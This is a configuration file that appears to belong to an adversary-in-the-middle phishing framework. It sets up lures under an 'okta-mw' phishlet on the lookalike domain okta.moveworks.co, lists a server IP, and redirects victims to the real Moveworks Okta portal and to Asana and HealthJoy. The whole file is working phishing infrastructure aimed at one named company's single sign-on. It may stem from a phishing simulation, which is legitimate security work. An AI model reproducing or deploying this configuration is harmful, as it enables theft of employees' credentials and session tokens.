blacklist_mode: "off"
ip: 3.80.70.47
lures:
- hostname: ""
  path: /sypuwbPa
  redirect_url: ""
  phishlet: okta-mw
  template: ""
  ua_filter: ""
  info: ""
  og_title: ""
  og_desc: ""
  og_image: ""
  og_url: ""
- hostname: ""
  path: /enduser/report-suspicious-activity
  redirect_url: https://moveworks.okta.com/app/UserHome
  phishlet: okta-mw
  template: ""
  ua_filter: ""
  info: ""
  og_title: ""
  og_desc: ""
  og_image: ""
  og_url: ""
- hostname: ""
  path: /app/UserHome
  redirect_url: https://moveworks.okta.com/app/UserHome
  phishlet: okta-mw
  template: ""
  ua_filter: ""
  info: ""
  og_title: ""
  og_desc: ""
  og_image: ""
  og_url: ""
- hostname: ""
  path: /auth
  redirect_url: https://docs.google.com/document/d/1LYzA2PjKpVqi1e9y63l5bztxgnR1sNYa3fkZNwMC-Do/edit
  phishlet: okta-mw
  template: ""
  ua_filter: ""
  info: ""
  og_title: ""
  og_desc: ""
  og_image: ""
  og_url: ""
- hostname: ""
  path: /asana
  redirect_url: https://app.asana.com/
  phishlet: okta-mw
  template: ""
  ua_filter: ""
  info: ""
  og_title: ""
  og_desc: ""
  og_image: ""
  og_url: ""
- hostname: ""
  path: /asana
  redirect_url: https://em.moveworks.com/NzkwLVhSSS0wODgAAAGHR-am6wQp3voNBix2jFete_FtmFObiCUMb2IAMTduqSLZkXa0y27O97y8DAbs297ux1eji7Y=
  phishlet: okta-mw
  template: ""
  ua_filter: ""
  info: ""
  og_title: ""
  og_desc: ""
  og_image: ""
  og_url: ""
- hostname: ""
  path: /healthjoy
  redirect_url: https://mygroups.healthjoy.com/
  phishlet: okta-mw
  template: ""
  ua_filter: ""
  info: ""
  og_title: ""
  og_desc: ""
  og_image: ""
  og_url: ""
redirect_key: ux
redirect_url: https://moveworks.okta.com/app/UserHome
server: okta.moveworks.co
site_domains:
  amazon: ""
  citrix: ""
  facebook: ""
  github: ""
  instagram: ""
  linkedin: ""
  o365: ""
  okta: ""
  okta-mw: ""
  okta-mw: okta.moveworks.co
  onelogin: ""
  outlook: ""
  protonmail: ""
  reddit: ""
  twitter: ""
  twitter-mobile: ""
  wordpress: ""
sites_enabled:
- okta-mw
verification_key: en
verification_token: 46ed
